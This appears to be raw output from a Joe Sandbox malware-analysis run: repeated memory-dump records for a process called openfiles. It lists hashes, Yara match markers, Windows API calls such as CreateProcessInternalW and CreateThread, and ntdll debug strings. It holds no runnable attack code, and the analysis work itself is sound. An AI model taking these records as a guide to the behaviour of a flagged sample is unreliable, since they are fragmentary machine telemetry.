                            • Instruction ID: 30e514ee31daf28fc63021d0f19f64b2077aa5436704e7ab61538d231a43a90e
                            • Opcode Fuzzy Hash: 5b2c27e7b5c50173b401a8957497d69309b3f3a8532fa3559a7c5c2b001896d4
                            • Instruction Fuzzy Hash: 0E90022560241506F10171584404616011A8BD0245F95C522A2129555ECA25DAD6A132
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 8e8015dfc11ff5a8c2d36825b45bca64e10ab22ce2d94d17690bf8be4b6f70a4
                            • Instruction ID: 66e73bcc7e0afc205c4c211a265593dfcc42720e6bbdf6373c7218dad8ecd19d
                            • Opcode Fuzzy Hash: 8e8015dfc11ff5a8c2d36825b45bca64e10ab22ce2d94d17690bf8be4b6f70a4
                            • Instruction Fuzzy Hash: 3490026520281407F1407558480460701158BD0306F55C511A3169555E8A29DD956136
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: ff0cd8c99b0b31e9866efbd536f8392a046b632880f582ae94e31d1f39d1515f
                            • Instruction ID: fc938a591724ac4069308422a8f01643eafb0efc990b750c94c369e732b6f9d6
                            • Opcode Fuzzy Hash: ff0cd8c99b0b31e9866efbd536f8392a046b632880f582ae94e31d1f39d1515f
                            • Instruction Fuzzy Hash: AB900225602410466140716888449064115AFE1215755C621A1A9D550D8559D9A95666
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: c79c7735682f562a5ca7fb6761eeb6d2dcc72fc657ade4004cbf4681b1115e5f
                            • Instruction ID: bc70aa3c6991262369418a96f0bb450a3e478e71040a27031acf7b2d5e9eca31
                            • Opcode Fuzzy Hash: c79c7735682f562a5ca7fb6761eeb6d2dcc72fc657ade4004cbf4681b1115e5f
                            • Instruction Fuzzy Hash: E1900225212C1046F20075684C14B0701158BD0307F55C615A1259554CC915D9A55522
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: c9226359fe54e6219b788eb4d90a65a506401801bb34408b9adf11c69d6e0644
                            • Instruction ID: 78e74b578cd5779fc6b1aebba17cd4604dd39279906cfd487155dc474356866a
                            • Opcode Fuzzy Hash: c9226359fe54e6219b788eb4d90a65a506401801bb34408b9adf11c69d6e0644
                            • Instruction Fuzzy Hash: F990026534241446F10071584414B060115CBE1305F55C515E2169554D8619DD966127
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 7c34f1c3ee2fed31728eacbb08373cb9082c62116cd3477ffcf8b7a791a60a05
                            • Instruction ID: 6212e4f62a961e0a42a246c44f8d11beacf3b783b5da3abd383846ecd88ea469
                            • Opcode Fuzzy Hash: 7c34f1c3ee2fed31728eacbb08373cb9082c62116cd3477ffcf8b7a791a60a05
                            • Instruction Fuzzy Hash: 98900229212410072105B558070450701568BD5355355C521F211A550CD621D9A55122
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: bab171294cd13dc629f063fd046348c798368d7beaa35b6bd57dab21d6e3b330
                            • Instruction ID: bbbd3ad53754f088e4c4eabaf061e123e6e7928c55937be302947b90c284193c
                            • Opcode Fuzzy Hash: bab171294cd13dc629f063fd046348c798368d7beaa35b6bd57dab21d6e3b330
                            • Instruction Fuzzy Hash: 7F900229222410062145B558060450B05559BD6355395C515F251B590CC621D9A95322
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 0e7b016d3a5637acc886d4326a7118811c8d88397da26377fdd036adc6e72e48
                            • Instruction ID: d811c7937b563f3fbab451628b658de5f024438a3106290783e45b367a5ce2c4
                            • Opcode Fuzzy Hash: 0e7b016d3a5637acc886d4326a7118811c8d88397da26377fdd036adc6e72e48
                            • Instruction Fuzzy Hash: 7D90023560641806F1507158441474601158BD0305F55C511A1129654D8755DB9976A2
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 364ac2cea10cd833c6e690758abb0e1c8f81f7d6f434ac92670f8988ebdfd72f
                            • Instruction ID: 0340f4ac0aad147c4fd9d5278b4a6600721a641aae3514ec10de2abc2ae401d1
                            • Opcode Fuzzy Hash: 364ac2cea10cd833c6e690758abb0e1c8f81f7d6f434ac92670f8988ebdfd72f
                            • Instruction Fuzzy Hash: 4A90023520645846F14071584404A4601258BD0309F55C511A1169694D9625DE99B662
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 25ce52d59ad0b0a8aef2274fdb8fa310db2f25f0d43c37084b69360d653d97a4
                            • Instruction ID: 170f0701720591c643ef5c016a8302a8800fc284dd950022c9db091d4e538c62
                            • Opcode Fuzzy Hash: 25ce52d59ad0b0a8aef2274fdb8fa310db2f25f0d43c37084b69360d653d97a4
                            • Instruction Fuzzy Hash: C090023520241806F1807158440464A01158BD1305F95C515A112A654DCA15DB9D77A2
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            APIs
                            • Sleep.KERNELBASE(000007D0), ref: 0283266C
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep
                            • String ID: net.dll$wininet.dll
                            • API String ID: 3472027048-1269752229
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 0282E647
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: Initialize
                            • String ID: @J7<
                            • API String ID: 2538663250-2016760708
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 0282E647
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: Initialize
                            • String ID: @J7<
                            • API String ID: 2538663250-2016760708
                            APIs
                            • GetFileAttributesW.KERNELBASE(?), ref: 028277BC
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: AttributesFile
                            • String ID:
                            • API String ID: 3188754299-0
                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02823EB2
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0
                            APIs
                            • CreateProcessInternalW.KERNELBASE(02820911,02820939,02820711,00000000,02827753,00000010,02820939,?,?,00000044,02820939,00000010,02827753,00000000,02820711,02820939), ref: 02837E43
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateInternalProcess
                            • String ID:
                            • API String ID: 2186235152-0
                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02823EB2
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0
                            APIs
                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02819495
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateThread
                            • String ID:
                            • API String ID: 2422867632-0
                            APIs
                            • RtlAllocateHeap.NTDLL(02821079,?,02834917,02821079,028340B7,02834917,?,02821079,028340B7,00001000,?,?,028395C0), ref: 02837D3C
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            APIs
                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,F445C77A,00000007,00000000,00000004,00000000,0282371D,000000F4,?,?,?,?,?), ref: 02837D8C
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            APIs
                            • GetFileAttributesW.KERNELBASE(?), ref: 028277BC
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: AttributesFile
                            • String ID:
                            • API String ID: 3188754299-0
                            APIs
                            • SetErrorMode.KERNELBASE(00008003,?,?,02821360,028367D7,028340B7,?), ref: 028275D3
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorMode
                            • String ID:
                            • API String ID: 2340568224-0
                            APIs
                            • PostThreadMessageW.USER32(?,00000111), ref: 028204D7
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID:
                            • API String ID: 1836367815-0
                            APIs
                            • SetErrorMode.KERNELBASE(00008003,?,?,02821360,028367D7,028340B7,?), ref: 028275D3
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorMode
                            • String ID:
                            • API String ID: 2340568224-0
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                            • API String ID: 48624451-2108815105
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                            • API String ID: 48624451-2108815105
                            Strings
                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 048F4787
                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 048F4725
                            • ExecuteOptions, xrefs: 048F46A0
                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 048F46FC
                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 048F4655
                            • Execute=1, xrefs: 048F4713
                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 048F4742
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID:
                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                            • API String ID: 0-484625025
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: __aulldvrm
                            • String ID: +$-$0$0
                            • API String ID: 1302938615-699404926
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: %%%u$[$]:%u
                            • API String ID: 48624451-2819853543
                            Strings
                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 048F02BD
                            • RTL: Re-Waiting, xrefs: 048F031E
                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 048F02E7
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID:
                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                            • API String ID: 0-2474120054
                            • Opcode ID: acb2b73383ed410518419f85d3859c4d7370ccf01f7aa3a6f9af8f7b85ec63c5
                            • Instruction ID: 6c1de7582569bd7c922855cfb9c807dd3d4a7b786f77f1e694a8f7b0fee1dd27
                            • Opcode Fuzzy Hash: acb2b73383ed410518419f85d3859c4d7370ccf01f7aa3a6f9af8f7b85ec63c5
                            • Instruction Fuzzy Hash: 37E190306047419FE725CF28C884B2AB7E0AB89318F144F6DE695C72D1E7B4F955CB52
                            Strings
                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 048F7B7F
                            • RTL: Re-Waiting, xrefs: 048F7BAC
                            • RTL: Resource at %p, xrefs: 048F7B8E
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID:
                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                            • API String ID: 0-871070163
                            • Opcode ID: 2ab7eb4907f9e920eeb48ff03c11392d8781c6e9244a64734061e9a6564861b0
                            • Instruction ID: 24136245513e8dc4914cd8a926074c2af356182723d3b084d4706cd1ee1cdeed
                            • Opcode Fuzzy Hash: 2ab7eb4907f9e920eeb48ff03c11392d8781c6e9244a64734061e9a6564861b0
                            • Instruction Fuzzy Hash: F141BE317057029FE720DE298C40BAAB7E5EB89714F000F2DE99ADBB80DB71F5058B91
                            APIs
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 048F728C
                            Strings
                            • RTL: Re-Waiting, xrefs: 048F72C1
                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 048F7294
                            • RTL: Resource at %p, xrefs: 048F72A3
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                            • API String ID: 885266447-605551621
                            • Opcode ID: cd956f8002accb6607414505ffaabd0097192f6524b21fdb94f1d793464c367b
                            • Instruction ID: 3e37b5ba76c413a228d0dd10d1aef2526f7c75550be2e106016fda09bb30b8e5
                            • Opcode Fuzzy Hash: cd956f8002accb6607414505ffaabd0097192f6524b21fdb94f1d793464c367b
                            • Instruction Fuzzy Hash: 4841C031700206AFE720DE65CC41B6AB7A5FB84714F104B29FA96EB780DB71F8528BD1
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: %%%u$]:%u
                            • API String ID: 48624451-3050659472
                            • Opcode ID: f02741d8e6fe2dca8741dcc3dcb30a05445ea14a22c20625c8466c9686156b2e
                            • Instruction ID: 3255f284c75462366673f64289830cddc231cc838e241b8c55f4834e40952f36
